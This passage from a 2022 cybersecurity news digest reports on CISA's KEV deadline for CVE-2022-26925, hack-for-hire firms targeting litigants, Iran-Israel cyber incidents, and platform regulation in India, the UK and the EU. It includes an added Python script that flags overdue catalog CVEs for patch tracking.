Analyst Comment: It is worth noting that the grand prizes offered in the DoD’s program are relatively small compared to other programs, especially those operated by private sector tech giants. Apple, for example, offers hundreds of thousands of dollars to individual winners. And Google awarded nearly $9M to researchers who discovered bugs throughout 2021.

The US State Department announced rewards of up to $10M for information leading to the identification of anyone working for or on behalf of a foreign government to interfere with US elections through “illegal cyber activities.” The reward is being offered as the US prepares for this fall’s midterm elections. This is also the second time the US State Department has offered such a reward, following a similar $10M reward prior to the 2020 presidential elections. Risky Biz US Department of State

CISA has ordered federal agencies to patch CVE-2022-26925 by July 22. In May, CISA had removed the CVE-2022-26925 Windows LSA (Local Security Authority) vulnerability from its Known Exploited Vulnerabilities (KEV) Catalog because of Active Directory (AD) certificate authentication problems observed after Microsoft’s May 2022 Patch Tuesday security updates were installed. Under Binding Operational Directive (BOD) 22-01, Reducing the Significant Risk of Known Exploited Vulnerabilities, Federal Civilian Executive Branch (FCEB) agencies must address catalogued vulnerabilities by their due dates to protect their networks against attacks exploiting those flaws. Experts also recommend that private organizations review the catalog and address the listed vulnerabilities in their own infrastructure. The flaw is a Windows LSA spoofing vulnerability that is actively exploited in the wild: an unauthenticated attacker can coerce a domain controller into authenticating to another server using NT LAN Manager (NTLM). CISA has now added CVE-2022-26925 to the catalog again and ordered federal agencies to fix the vulnerability by July 22, and it has released guidance on applying Microsoft’s June Patch Tuesday updates for CVE-2022-26925. Security Affairs
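BOD 22-01 turns the KEV catalog into a list of deadlines, so the practical check is whether each catalogued CVE is remediated before its due date. The following is an added example (not from the newsletter or CISA): it parses a constructed catalog sample whose field names mirror the public KEV JSON feed as I know it (cveID, vulnerabilityName, dateAdded, dueDate, requiredAction) and reports which entries are overdue against a set of CVEs the organization has already fixed; the dateAdded value and the second CVE entry are placeholders.

```python
import json
from datetime import date

# Constructed sample in the shape of the KEV JSON feed (not a real download).
SAMPLE_CATALOG = json.dumps({
    "title": "constructed sample catalog",
    "vulnerabilities": [
        {"cveID": "CVE-2022-26925",
         "vulnerabilityName": "Microsoft Windows LSA Spoofing Vulnerability",
         "dateAdded": "2022-07-01",  # constructed; the real re-add date is not in the newsletter
         "dueDate": "2022-07-22",    # due date cited in the newsletter
         "requiredAction": "Apply updates per vendor instructions."},
        {"cveID": "CVE-0000-00000",  # placeholder entry, not a real CVE
         "vulnerabilityName": "placeholder vulnerability",
         "dateAdded": "2022-01-01",
         "dueDate": "2022-12-31",
         "requiredAction": "Apply updates per vendor instructions."},
    ],
})

def parse_catalog(raw: str) -> dict:
    """Return {cveID: entry} with the ISO dueDate string parsed into a date."""
    entries = {}
    for item in json.loads(raw)["vulnerabilities"]:
        entries[item["cveID"]] = {**item, "dueDate": date.fromisoformat(item["dueDate"])}
    return entries

def remediation_status(raw: str, remediated: set, today: date) -> dict:
    """Classify each catalog CVE as 'done', 'overdue' or 'pending' as of today."""
    status = {}
    for cve, entry in parse_catalog(raw).items():
        if cve in remediated:
            status[cve] = "done"
        elif entry["dueDate"] < today:
            status[cve] = "overdue"  # past the BOD 22-01 due date and still open
        else:
            status[cve] = "pending"
    return status

def overdue_cves(raw: str, remediated: set, today: date) -> list:
    """Sorted list of catalog CVEs that are still open past their due date."""
    return sorted(c for c, s in remediation_status(raw, remediated, today).items()
                  if s == "overdue")

if __name__ == "__main__":
    # Example run: nothing patched yet, the day after the July 22 deadline.
    print(overdue_cves(SAMPLE_CATALOG, set(), date(2022, 7, 23)))
```

Pointing `SAMPLE_CATALOG` at the downloaded feed and `remediated` at your patch inventory gives the same report for the live catalog.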


GEOPOLITICS

Israel’s Defense Minister Benny Gantz accused Iran and its Lebanese proxy Hezbollah recently of attempting a cyberattack against a UN peacekeeping force in southern Lebanon in order to steal operational information. Gantz’s announcement came after a large cyberattack forced Iran’s state-owned Khuzestan Steel to halt production, and two other major steel producers reported being targeted as well. After several Israeli media outlets reported that Israel’s cyber units were likely behind the cyberattacks, the Israeli Defense Ministry said it would launch an internal investigation. According to officials, the hack and its attribution to Israel violate Israel’s “ambiguity policy.” Risky Biz The Times of Israel

LAW & DATA PRIVACY

An investigation discovered thousands of email records that revealed how Indian cyber mercenaries hacked parties involved in cases around the world, demonstrating how hired cyber spies have become the secret weapon of litigants seeking an edge. There were 35 cases in which Indian hackers attempted to obtain documents from one or both sides of a courtroom battle by sending them password-stealing emails. These hacking attempts targeted at least 75 US and European companies, three dozen advocacy and media groups, and numerous Western business executives. One example was aviation executive Farhad Azima, an Iranian-American who was found liable by a London court for cheating his former business partner, an investment fund based in the emirate of Ras Al Khaimah. But the case relied heavily on hacked emails that had mysteriously been posted to the web by an apparent whistleblower. Azima initiated his own investigation when Reuters contacted him. His legal team searched his and his colleagues’ inboxes and found 700 malicious emails in 16 months. The breach occurred in March 2016, according to Azima’s legal team. In legal filings, Azima’s lawyers accused Indian tech firms CyberRoot Risk Advisory Private Ltd and BellTroX Infotech Services Private Ltd of spying. CyberRoot’s hackers created anonymous websites to distribute Azima’s stolen emails, according to court documents. A former CyberRoot employee was quoted in one of the filings as saying the “Azima Exposed” sites were intended “to mimic a genuine whistleblower campaign in similar fashion to offshore leaks like the Panama Papers.” In March of last year, Azima won a retrial in his London case, with a three-judge panel at Britain’s Court of Appeal ruling that the revelations from India would necessitate a complete re-evaluation of the evidence supporting the hacking claim. “The hack-for-hire companies may be thousands of miles away, but the victims are often U.S. citizens on U.S. soil,” according to Azima. Reuters

Twitter asked an Indian court on Tuesday, July 5, to overturn some government orders to remove content from the social media platform in a legal challenge alleging official abuse of power, according to a source familiar with the matter. Twitter argued in a filing with the top court in the southern Indian state of Karnataka that some removal orders did not meet the procedural requirements of India’s IT Act. The IT Act empowers the government to restrict public access to content for a variety of reasons, including national security. Twitter, which according to market research firms has nearly 24M users in India, also claimed in its filing that some of the orders failed to provide notice to content authors. Some orders related to political content posted by official handles of political parties, the blocking of which amounts to a violation of free speech, according to the source. India, which ranks among the countries issuing the most government requests for content takedowns, is considering changes to its new IT rules, including the establishment of a government-run appeals panel with the authority to overturn social media firms’ content moderation decisions. Reuters

With an amendment to its forthcoming comprehensive new online safety law, the UK will require platform owners such as social media companies and search engines to combat “state-linked disinformation” or face fines. The Department for Digital, Culture, Media, and Sport announced that owners of platforms where users can post their own content will be required by law to prevent posts backed by foreign governments from “interfering with the UK.” The forthcoming Online Safety Bill gives Ofcom the authority to levy fines of up to 10% of a company’s annual global sales if it fails to comply. Separately, on Tuesday, July 5, EU lawmakers approved landmark rules aimed at reining in tech giants such as Google, Amazon, Apple, Facebook, and Microsoft. Along with the Digital Markets Act (DMA) rules, lawmakers also approved the Digital Services Act (DSA), which requires online platforms to do more to police the internet for illegal content. Companies will not be permitted to favor their own services over competitors’, nor will they be permitted to prevent users from removing pre-installed software or apps, two rules that will severely impact Google and Apple, according to an analyst. Bloomberg Reuters
